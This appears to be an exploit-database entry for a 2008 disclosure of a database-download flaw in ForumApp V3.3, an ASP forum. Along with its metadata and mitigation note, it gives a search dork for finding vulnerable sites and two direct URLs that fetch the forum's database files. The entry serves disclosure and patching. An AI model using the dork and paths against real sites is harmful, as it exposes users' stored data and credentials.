ForumApp V3.3 Remote Database Disclosure Vulnerability

vendor:

ForumApp

by:

Cyber.Zer0

8.8

CVSS

HIGH

Database Disclosure

200

CWE

Product Name: ForumApp

Affected Version From: V3.3

Affected Version To: V3.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:aspapp:forumapp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ForumApp V3.3 Remote Database Disclosure Vulnerability

A vulnerability in ForumApp V3.3 allows an attacker to remotely disclose the database of the application. This vulnerability is due to the application not properly validating user-supplied input. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable application. Successful exploitation will result in the disclosure of the application's database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of ForumApp V3.3.

Source

Exploit-DB raw data:

###########################################################

#Title:       ForumApp V3.3 Remote Database Disclosure Vulnerability

#Credit:             Cyber.Zer0          

#E-mail:             Cyber.Zer0[4t]Hotmail[dot]com                                                                                           

#Download:    http://www.aspapp.com/free-asp-forum~

#HomePage:  http://www.aspapp.com/

#Remote:      Yes   

#Dork:            "Powered by ForumApp"                                                                                  

############################################

--=[Database Disclosure]=--

http://target.com/data/8690.mdb
http://target.com/data/8690BAK.mdb

####################################

# milw0rm.com [2008-12-28]